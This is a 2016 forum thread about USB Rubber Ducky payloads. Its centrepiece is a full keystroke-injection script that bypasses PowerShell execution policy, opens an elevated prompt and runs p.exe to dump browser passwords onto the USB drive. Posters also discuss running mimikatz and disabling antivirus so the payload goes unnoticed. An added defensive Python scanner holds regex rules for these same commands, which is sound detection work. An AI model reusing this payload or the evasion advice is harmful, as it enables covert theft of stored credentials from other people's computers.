Ferryman, posted November 27, 2016: Cool, will check it out this evening. Thanks.
846846, posted November 27, 2016: Hello Enzym3, link works fine now... thanks.
Enzym3, posted November 28, 2016: Keep in mind, this is not what I intended to release. This was just a few hours' work taking two separate tools already available, heavily gutting and jerry-rigging them just enough that I knew it would work in concept. Prior to starting this project, I had zero experience in PowerShell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edits I've made and it looks sloppy as all hell, or there are multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code left over from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything, making it efficient and adding a handful of other handy features. TL;DR - I'm brand new to PowerShell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least it can serve as a springboard for some way cooler shit. Cheers, -Enzym3
Mr.X, posted December 8, 2016, replying to EvilTtaM (9/14/2016 at 2:50 PM: "I attached the Ducky Code I used, If there are any suggestions for changes please let me know. I will add that this code assumes that the executionpolicy is set to bypass, however it could be written in to change that." - attachment: 15secondhack.txt): Your version doesn't bypass the running-scripts restriction. I get something like: running scripts is disabled on this machine. Which means it can't execute the mimikatz script. Did you fix that yet?
jes, posted December 9, 2016: Thanks for all this Enzym3. Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe?
SOMEB, posted December 10, 2016: Is there a way you can make it so I can run it on the normal Duck instead of the Twin Duck? Either way, thanks.
jes, posted December 10, 2016, replying to Mr.X (2016-12-08 at 6:42 PM: "Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?"): I got the same error for whiterabbit.ps1.
jes, posted December 10, 2016: Here is a payload that will run the p.exe using command prompt instead of PowerShell... I wanted this because not all computers have PowerShell enabled but they all have command prompt ;)

DELAY 1200
GUI R
DELAY 300
STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"
DELAY 200
ENTER
DELAY 500
ALT y
DELAY 100
LEFTARROW
DELAY 200
DELETE
DELAY 200
STRING mode con lines=1 cols=18
DELAY 80
ENTER
DELAY 80
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d
DELAY 250
ENTER
DELAY 200
STRING %duck%
ENTER
DELAY 150
STRING p.exe /stext pass.txt
DELAY 100
ENTER
DELAY 2000
STRING exit
DELAY 80
ENTER

I'm not 100% sure why I need the LEFTARROW or DELETE commands; I'm thinking of taking them out, but I also grabbed portions of this from elsewhere of course and they were there. Open to suggestions.
jes, posted December 10, 2016: Sorry, forgot to mention that p.exe grabs the browser passwords and you need the Twin Duck firmware installed to be able to save them onto the USB in this script.
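Added example, not written by anyone in this thread: a small Python scanner that shows what the payload above looks like from the defender's side. It applies three detection rules mirroring the posted lines (execution-policy bypass that launches an elevated cmd, volume lookup by label, and the /stext dump switch) to a few constructed Sysmon-style process-creation records; the record layout and sample paths are assumptions.

```python
import re

# Constructed Sysmon Event ID 1-style records (not real captures), flattened to
# "image|parent_image|command_line". Only the first two "|" are delimiters, so
# pipes inside the command line survive the split.
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|explorer.exe|"
    'powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"',
    "C:\\Windows\\System32\\cmd.exe|cmd.exe|"
    'C:\\Windows\\system32\\cmd.exe /c wmic volume get driveletter, label|findstr "QUACK"',
    "C:\\Windows\\System32\\wbem\\WMIC.exe|cmd.exe|wmic volume get driveletter, label",
    "E:\\p.exe|cmd.exe|p.exe /stext pass.txt",
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|explorer.exe|"
    "powershell -File C:\\scripts\\backup.ps1",
    "C:\\Program Files\\Git\\bin\\git.exe|code.exe|git status",
]

# Detection rules: (name, regex applied to the lower-cased command line).
# Each one mirrors a line of the posted Ducky payload.
RULES = [
    ("execpolicy_bypass_to_elevated_cmd",
     re.compile(r"-exec(utionpolicy)?\s+bypass.*start-process\s+cmd.*-verb\s+runas")),
    ("volume_lookup_by_label",
     re.compile(r"wmic\s+volume\s+get\s+driveletter.*findstr")),
    ("stext_dump_switch",  # the "/stext <file>" switch used by the posted p.exe line
     re.compile(r"\S+\.exe\s+/stext\s+\S+")),
]


def parse_event(line):
    image, parent, cmdline = line.split("|", 2)
    return {"image": image, "parent": parent, "cmdline": cmdline}


def match_rules(cmdline):
    """Return the names of every rule whose pattern appears in cmdline."""
    low = cmdline.lower()
    return [name for name, rx in RULES if rx.search(low)]


def scan(lines):
    """Return (rule_name, image) for each event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for name in match_rules(ev["cmdline"]):
            hits.append((name, ev["image"]))
    return hits


if __name__ == "__main__":
    for name, image in scan(SAMPLE_EVENTS):
        print(f"{name}: {image}")
```

The third sample (the bare wmic child process) intentionally does not fire: the findstr pipe lives in the parent cmd line, so a rule that only looks at WMIC.exe's own command line would miss this step.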
authorityfinger, posted December 12, 2016: Lol, I was gonna demonstrate this to my friend, but his AV (Avast) detected p.exe as a trojan and deleted it :(
jes, posted December 13, 2016, replying to authorityfinger ("Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :("): Ha, yeah, it gets caught by antivirus. You have to disable them before inserting the Ducky. Then you're fine.
Ferryman, posted December 13, 2016: See, that's the thing. I know we are just being a bunch of script kiddies and that is why AV is detecting us, but there needs to be a way to go unnoticed. I mean, that is the purpose of this, isn't it?